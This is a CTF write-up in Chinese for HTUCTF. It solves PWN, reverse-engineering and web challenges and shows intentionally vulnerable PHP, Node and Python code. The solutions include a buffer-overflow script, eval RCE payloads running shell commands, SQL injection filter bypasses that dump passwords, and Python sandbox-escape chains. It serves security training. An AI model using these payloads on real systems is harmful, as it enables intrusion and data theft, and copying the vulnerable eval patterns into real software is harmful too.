卡里分离图片得到压缩包,解压压缩包即可。

HTUCTF{you_can_encrypt_anything_in_anywhere}

PWN

ez_nc_签到

题目

听说nc指令很神奇?
题目难度:签到

我的解答:

nc连接靶机跟着步骤走就行。签到题没难度。

环境?环境!

题目

万事开头难 不如我们先配置一下Pwn环境吧!
题目难度:简单

我的解答:

根据txt所说走就行,前提是自己配好环境,然后运行脚本即可获得flag

完形填空

题目

什么?Pwn也可以完形填空?我竟然不用自己写脚本!可是这个栈溢出怎么写呢?溢出值是多少啊啊啊!!!
题目难度:中等

我的解答:

buf到rbp的偏移是0x20,16进制转成10进制是32,也就是前面的buf[32]

简单跑一下后ls没效果。程序是64位的,buf后面还有8字节的保存rbp没有覆盖,补上这8个字节即可,也就是padding=32+8=40

from pwn import *

# pwntools settings: verbose logging, 64-bit Linux target.
context(log_level='debug',arch='amd64',os='linux')   
ip =''    # placeholder: the host given by the challenge
port=     # placeholder: the port given by the challenge; must be filled in, the line is not valid Python as written
p = remote(ip,port)
# Absolute code address of the challenge's backdoor function.
# NOTE(review): hard-coded addresses only hold when the binary loads at a fixed
# base, and reaching the return address this way assumes no stack canary.
# Presumably PIE and the stack protector are both disabled in this challenge
# binary; either mitigation would stop this input. Confirm against the binary.
backdoor=0x401225
# 32-byte buffer plus the 8-byte saved rbp (see the text above).
padding=40
# NOTE(review): the write-up does not explain 0x401016, the address placed
# ahead of `backdoor`; confirm its role against the binary.
payload=padding*b'a'+p64(0x401016)+p64(backdoor)
p.sendafter("please input:",payload)
p.interactive()

跑成功后ls看到flag 再cat flag即可。

RE

猜数字_签到

题目

厌倦了那些难题?那就加点运气成分,来猜一个0-127内的数字吧,猜对了我就会告诉你flag!你可以使用二分法来尝试,不过每轮我只会给你5次机会,所以你最后一次猜中的概率是多少呢?靠运气 or 实力,决定权在你。
题目难度:随机(取决于想怎么做)
题目考点:逆向或者运气

我的解答:

最简单的逆向没有之一。

二分法多试几下就出了。

ez_xor

题目

异或是一种计算机运算操作,具体来说,异或表示了相同为0,不同为1的数学运算
我们用^表示异或,英语中异或为xor
我将给你一个程序,请你利用群中所上传的IDA逆向工具试图进行逆向
并找到flag
题目难度:简单

我的解答:

exp:

def reverse_engineer_flag():
    """Recover the flag by XOR-ing each stored byte table with its key string.

    Returns:
        The concatenated result of both stages as a str.
    """
    # (key string, byte table) pairs in the order their output is joined.
    # The original names s/v8 and v11/v9 presumably mirror the decompiler output.
    stages = [
        ("tryw1th", [28, 6, 12, 20, 69, 18, 19]),
        ("s1mplex0r", [11, 1, 31, 47, 9, 81, 11, 73, 15]),
    ]

    recovered = []
    for key, table in stages:
        # XOR is its own inverse: stored_byte ^ key_byte gives the plaintext byte.
        recovered.extend(chr(value ^ ord(key_char)) for value, key_char in zip(table, key))

    return "".join(recovered)


if __name__ == "__main__":
    # Script entry point: compute the flag once and print it.
    recovered_flag = reverse_engineer_flag()
    print(f"Flag: {recovered_flag}")
# Flag: htuctf{x0r_e4sy}

倒车工程

题目

你最近了解到一家汽车公司,他们正在开发一种全新的自动驾驶系统。你对其中的“倒车工程”(Reverse Engineering)模块十分感兴趣,可是在使用时需要输入密码,这可怎么办呢?公司的员工告诉你:逆向嘛很简单,把屏幕倒过来就行(你内心吐槽:呃布什戈门,屏幕倒过来是什么鬼......
题目难度:简单

# -*- coding: utf-8 -*-
"""
倒车技术,我们是专业的! --2024.4.25 EMT倒车公司开发
"""

import time

# 倒车安全性校验
def compare_password(input_password):
    """Return True only when the input's code points equal the embedded list.

    The expected password is stored in this source file as plain character
    codes, so anyone who can read the file can read the password.
    """
    expected_codes = [0x48,0x54,0x55,0x43,0x54,0x46,0x7b,0x57,0x65,0x31,0x63,0x30,0x6d,0x65,0x5f,0x74,0x30,0x5f,0x72,0x33,0x76,0x65,0x72,0x73,0x65,0x5f,0x65,0x6e,0x67,0x31,0x6e,0x65,0x65,0x72,0x31,0x6e,0x67,0x7d]

    entered_codes = list(map(ord, input_password))

    return entered_codes == expected_codes

# 倒车主系统
def main():
    """Prompt for the password and, when it matches, run the simulated routine."""
    password = input("请输入倒车密码:")
    # Guard clause: a wrong password ends the run immediately.
    if not compare_password(password):
        print("密码错误!请重试。")
        return

    print("密码正确!欢迎使用倒车系统。")
    print("自动倒车中......")
    time.sleep(5)
    # Note: the accepted password is echoed back to the terminal here.
    print("倒车完成!请不要忘记你的密码:{},欢迎下次使用".format(password))

if __name__ == "__main__":
    main()

我的解答:

exp:

# Character codes copied from compare_password() in the challenge source.
numbers = [0x48, 0x54, 0x55, 0x43, 0x54, 0x46, 0x7b, 0x57, 0x65, 0x31, 0x63, 0x30, 0x6d, 0x65, 0x5f, 0x74, 0x30, 0x5f, 0x72, 0x33, 0x76, 0x65, 0x72, 0x73, 0x65, 0x5f, 0x65, 0x6e, 0x67, 0x31, 0x6e, 0x65, 0x65, 0x72, 0x31, 0x6e, 0x67, 0x7d]

# Each code is one character of the expected password, which is the flag.
flag = ''.join(map(chr, numbers))

print(flag)
# HTUCTF{We1c0me_t0_r3verse_eng1neer1ng}

firmware_decryption

题目

你的路由器坏掉了,你提取了路由器原有的固件(old_firmware.bin),并拿了一份新的固件(new_firmware.bin)。
但你在升级的时候发现新的固件是加密的,于是你心想:加密与解密!(解密后的新固件中包含有flag)
题目难度:难

我的解答:

1.给了一个加密的新固件包和一个未加密的固件包,大概率是中间版本这个旧固件应该是有解密新固件的程序

2.HxD打开看看旧固件发现一个真签名后面有用

3.binwalk解包旧固件后 grep -r download查找关键的词汇在StartFirmwareDownload.php文件中发现download

4.分析这边是一个关键代码,首先获取/etc/config/image_sign的签名,读取到$image_sign变量中,执行encimg -d -i  $fw_path是要解密的固件, -s 后是签名

5.去找到一下那个签名文件发现签名被修改了

6.IDA打开encimg这个文件,根据打印信息查看每个参数的作用:-d是解密,-s是签名(签名和解密有关)。大致分析了一下,是AES256 CBC模式的加密

7.现在只要执行这个encimg文件即可。这是一个MIPS架构32位大端的程序,需要使用qemu模拟执行。但是缺少签名,想起旧固件中的signature,拿来尝试解密,解密成功后binwalk解包新固件

8.查看flag文件夹下的flag.txt获得flag

WEB

debugme_签到

题目

你是开发人员吗?
题目难度:签到

我的解答:

签到题,控制台就有答案。

easy_rce

题目

最简单的RCE,eval函数是非常危险的!
你能逃过md5的围追堵截吗?
题目难度:简单

 <?php
// Intentionally vulnerable CTF challenge source. The comments name the flaws.
highlight_file(__FILE__);
// Silences all warnings and notices, including any raised by the calls below.
error_reporting(0);
if($_GET['from']=="HTUCTF"){
    // Flaw 1: the two hashes are compared with loose `==` and the inputs are
    // never checked to be strings. Parameters sent as m1[]=... arrive as arrays.
    // NOTE(review): on PHP versions where md5() returns NULL for an array, both
    // sides are NULL and compare equal while `!==` on the two arrays is still
    // true. Require is_string() on both inputs and compare with hash_equals().
    if((md5($_GET['m1']) == md5($_GET['m2'])) && ($_GET['m1'] !== $_GET['m2'])){
        // Flaw 2: the request body is executed as PHP. No input check makes this
        // safe; the fix is to remove eval() on request data altogether.
        eval($_POST['cmd']);
    }else{
        die("you cant put the same md5 value into here");
    }
}else{
    die("Wrong?Where are you from<br>");
}


?>
Wrong?Where are you from

我的解答:

rce签到题。直接打

GET传参(数组绕过就行):?from=HTUCTF&m1[]=123&m2[]=456

POST传参(注意:此flag不在根目录就在当前目录):cmd=system("cat flag");

HTUCTF{8cdae6c6-2f02-4c3f-9f75-4fd21098600d}

evalPHP

题目

做web开发的首要安全指南:
不要对任何用户输入的数据保持信任!!一定要做安全检查!!!
但很显然小明觉得嗤之以鼻,他觉得没人能够在一个必定报错的语句上进行执行
你能够找到方法绕过并获得flag吗?
难度:中等偏难

PHP文件包含漏洞

 <?php
// Intentionally vulnerable CTF challenge source. The comments name the flaws.
highlight_file(__FILE__);
// Flaw 1: $_GET['file'] is passed to file_get_contents() unchecked, so the
// caller chooses both the path and the stream wrapper. The "file" can then be
// content supplied in the URL itself. Restrict it to an allowlist of local
// paths.
$data = file_get_contents($_GET['file']);
if($data === "HTUCTF"){
    $cmd = $_POST['cmd'];
    // Flaw 2: appending a fixed suffix does not make eval() safe. The request
    // body supplies everything that runs before the suffix is reached.
    eval($cmd."No_What_are_you_doing!!!");
}else{
    die("no,where are you from");
}
?>

Warning: file_get_contents(): Filename cannot be empty in /var/www/html/index.php on line 3
no,where are you from

我的解答:

提示说了:PHP文件包含漏洞

当然不说也能看出来哈哈哈,确实贴心!

dirsearch扫后台发现flag.php,然后可以利用data://伪协议打。

GET传参:?file=data://text/plain;base64,SFRVQ1RG

注1:SFRVQ1RG是HTUCTF的base64编码值。这里需要先做base64编码,不编码的话正常是打不通的(已试)。

POST传参:cmd=system("tac flag.php");?>

注2:这里用tac绕过,正常cat不行。

HTUCTF{15e0cd0a-3f7e-49c3-abaa-d81badb9898e}

evalPHP卷土重来

题目

修复了非预期,这次是真的中等偏难了

 <?php
// Intentionally vulnerable CTF challenge source. The comments name the flaws.
highlight_file(__FILE__);
$file = $_GET['file'];
if(isset($file)){
    // Blocklist of scheme prefixes, matched only at the start of the string.
    // Any wrapper not listed here still passes, so the list cannot be complete.
    // An allowlist of permitted local paths is the robust check.
    if(preg_match("/^http|^ftp|^https|^data|^phar|^zip/i", $file)){
        die("bad hacker!!!");
    }
    $data = file_get_contents($file);
    if($data === "HTUCTF"){
        $cmd = $_POST['cmd'];
        // The input passes when nothing is left after removing `_ ( ) ; '`,
        // `*`, word characters and whitespace. That is an allowlist of
        // characters, not of operations: identifiers, parentheses, quotes and
        // semicolons are enough to write complete function calls.
        if(preg_replace("/_|\(|\)|;|\w+|'|\s+|\*/", "", $cmd) === ""){
            // The fixed suffix does not neutralise what the request supplies
            // before it; eval() on request data remains code execution.
            eval($cmd."No_What_are_you_doing!!!");
        }else{
            die("No!!!!");
        }
        
    }else{
        die("no,where are you from");
    }
}
?>

我的解答:

GET上传 ?file=compress.zlib://data://text/plian,HTUCTF

POST上传 cmd=system('tac f*');__halt_compiler();

HTUCTF{2c392f42-573b-4580-bb4b-613502d6bc04}

easy_SQL

题目

简单的SQL注入
题目难度:中等

我的解答:

有waf,双写绕过即可。

payload为:

爆数据库名:
-admin'uunionnion/**/sselectelect/**/database()#

爆表名:
-admin'uunionnion/**/sselectelect/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema='users'#

爆字段名:
-admin'uunionnion/**/sselectelect/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='users'#

爆flag:
-admin'uunionnion/**/sselectelect/**/group_concat(passwoorrd)/**/from/**/users#

HTUCTF{41f789fe-643c-4322-be0a-f05eaa584340}

eznode

题目

喜欢我们前后端通吃的javascript吗

可以先了解一下js和http协议的内容

const { readFileSync } = require('fs')
const express = require('express')

const flag = process.env['FLAG']
const app = express()
// Site root: return this application's own source file as plain text.
app.get("/", function serveOwnSource(request, response) {
    response.setHeader('Content-Type', 'text/plain');
    const ownSource = readFileSync("./app.js", 'utf-8');
    response.send(ownSource);
});

// Intentionally vulnerable CTF route: returns the value of a caller-named variable.
app.get("/get_var", (req, res) => {
    let check = req.header("Check")
    // Loose `==` between the header string and a nested array: the array is
    // converted to the string "114514" before comparing, so this is just a
    // fixed, publicly visible header value and not an authentication check.
    if (check && check == [[[[[[[114514]]]]]]]) {
        let vara = req.query['var']
        // The regex restricts the input to letters only, i.e. a bare identifier.
        if (vara && /^[a-zA-Z]+$/.test(vara)) {
            // eval() of an identifier resolves it in this scope, so every
            // binding visible here, including `flag`, can be read by name.
            // A safe design looks the name up in an explicit allowlist object
            // and never calls eval().
            res.send(eval(vara))
        } else {
            res.send('invalid input!')
        }    
    } else {
        res.send("check failed")
    }
})

// Start the HTTP server on port 80 and log once it is accepting connections.
app.listen(80, function onListening() {
    console.log("listening at 0.0.0.0:80");
});

我的解答:

简单题。payload如下:

GET传参 /get_var?var=flag 

添加头 check: 114514

flag{41dd607d-0ecb-475d-96ef-813da205430e}

python_eval_easy

题目

在这次,我们似乎获得了eval之神的宠爱,他散发出特殊的气味,把我们带到了此地
他拥有神秘的力量,能够帮你把语句变为现实
你知道python如何getshell吗?
题目难度:中等偏易

我的解答:

控制台发现/tell?me=xxx

典型的沙盒了。引号和空格用%做URL编码(%22、%20)。payload如下:

/tell?me=__import__(%22os%22).popen(%22cat%20/f*%22).read()

HTUCTF{a48bcee4-9d76-46a4-8ad4-51a9f44955ea}

EvalIt!!!

题目

这次,看来eval之神的网络不太好啊?你还能够获取到eval之神的信任吗?
题目难度:中等

我的解答:

/tell?me=open('app.py').read()查看源码

len(data) < 28 有长度限制,直接转到/BackDoorsInGuoql路由下打

import requests
# Placeholder address; the host and port come from the challenge instance.
url = "http://xxx.xxx.xxx.xx:xxxxx/BackDoorsInGuoql"
# The "eval" field holds a Python expression.
# NOTE(review): that this works implies the route evaluates request-supplied
# text. Presumably the server calls eval() on this field; its source is not
# shown here. Length limits or a reduced builtins table do not sandbox eval(),
# and the only robust fix is not to evaluate request data.
data = {"eval": "str(''.__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('cat /f*').read())"}
# requests sends `data` as a form-encoded body even though the method is GET.
response = requests.get(url=url,data=data)
print(response.text)

 

 
